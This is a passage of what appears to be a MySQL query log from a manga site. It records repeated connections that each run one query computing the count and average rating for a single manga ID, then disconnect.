Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330649772 Quit 330649773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330649773 Quit 330649774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330649774 Quit 330649775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330649775 Quit 330649776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330649776 Quit 330649777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330649777 Quit 330649778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330649778 Quit 330649779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330649779 Quit 330649780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330649780 Quit 330649781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330649781 Quit 330649782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330649782 Quit 330649783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330649783 Quit 330649784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330649784 Quit 330649785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330649785 Quit 330649786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330649786 Quit 330649787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330649787 Quit 330649788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330649788 Quit 330649789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330649789 Quit 330649790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330649790 Quit 330649791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330649791 Quit 330649792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330649792 Quit 330649793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330649793 Quit 330649794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330649794 Quit 330649795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330649795 Quit 330649796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330649796 Quit 330649797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330649797 Quit 330649798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330649798 Quit 330649799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330649799 Quit 330649800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330649800 Quit 330649801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330649801 Quit 330649802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330649802 Quit 330649803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330649803 Quit 330649804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330649804 Quit 330649805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330649805 Quit 330649806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330649806 Quit 330649807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330649807 Quit 330649808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330649808 Quit 330649809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330649809 Quit 330649810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330649810 Quit 330649811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330649811 Quit 330649812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330649812 Quit 330649813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330649813 Quit 330649814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330649814 Quit 330649815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330649815 Quit 330649816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330649816 Quit 330649817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330649817 Quit 330649818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330649818 Quit 330649819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330649819 Quit 330649820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330649820 Quit 330649821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330649821 Quit 330649822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330649822 Quit 330649823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330649823 Quit 330649824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330649824 Quit 330649825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330649825 Quit 330649826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330649826 Quit 330649827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330649827 Quit 330649828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330649828 Quit 330649829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330649829 Quit 330649830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330649830 Quit 330649831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330649831 Quit 330649832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330649832 Quit 330649833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330649833 Quit 330649834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330649834 Quit 330649835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330649835 Quit 330649836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330649836 Quit 330649837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330649837 Quit 330649838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330649838 Quit 330649839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330649839 Quit 330649840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330649840 Quit 330649841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330649841 Quit 330649842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330649842 Quit 330649843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330649843 Quit 330649844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330649844 Quit 330649845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330649845 Quit 330649846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330649846 Quit 330649847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330649847 Quit 330649848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330649848 Quit 330649849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330649849 Quit 330649850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330649850 Quit 330649851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330649851 Quit 330649852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330649852 Quit 330649853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330649853 Quit 330649854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330649854 Quit 330649855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330649855 Quit 330649856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330649856 Quit 330649857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330649857 Quit 330649858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330649858 Quit 330649859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330649859 Quit 330649860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330649860 Quit 330649861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330649861 Quit 330649862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330649862 Quit 330649863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330649863 Quit 330649864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330649864 Quit 330649865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330649865 Quit 330649866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330649866 Quit 330649867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330649867 Quit 330649868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330649868 Quit 330649869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330649869 Quit 330649870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330649870 Quit 330649871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330649871 Quit 330649872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330649872 Quit 330649873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330649873 Quit 330649874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330649874 Quit 330649875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330649875 Quit 330649876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330649876 Quit 330649877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330649877 Quit 330649878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330649878 Quit 330649879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330649879 Quit 330649880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330649880 Quit 330649881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330649881 Quit 330649882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330649882 Quit 330649883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330649883 Quit 330649884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330649884 Quit 330649885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330649885 Quit 330649886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330649886 Quit 330649887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330649887 Quit 330649888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330649888 Quit 330649889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330649889 Quit 330649890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330649890 Quit 330649891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330649891 Quit 330649892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330649892 Quit 330649893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330649893 Quit 330649894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330649894 Quit 330649895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330649895 Quit 330649896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330649896 Quit 330649897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330649897 Quit 330649898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330649898 Quit 330649899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330649899 Quit 330649900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330649900 Quit 330649901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330649901 Quit 330649902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330649902 Quit 330649903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330649903 Quit 330649904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330649904 Quit 330649905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330649905 Quit 330649906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330649906 Quit 330649907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330649907 Quit 330649908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330649908 Quit 330649909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330649909 Quit 330649910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330649910 Quit 330649911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330649911 Quit 330649912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330649912 Quit 330649913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330649913 Quit 330649914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330649914 Quit 330649915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330649915 Quit 330649916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330649916 Quit 330649917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330649917 Quit 330649918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330649918 Quit 330649919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330649919 Quit 330649920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330649920 Quit 330649921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330649921 Quit 330649922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330649922 Quit 330649923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330649923 Quit 330649924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330649924 Quit 330649925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649925 Query select 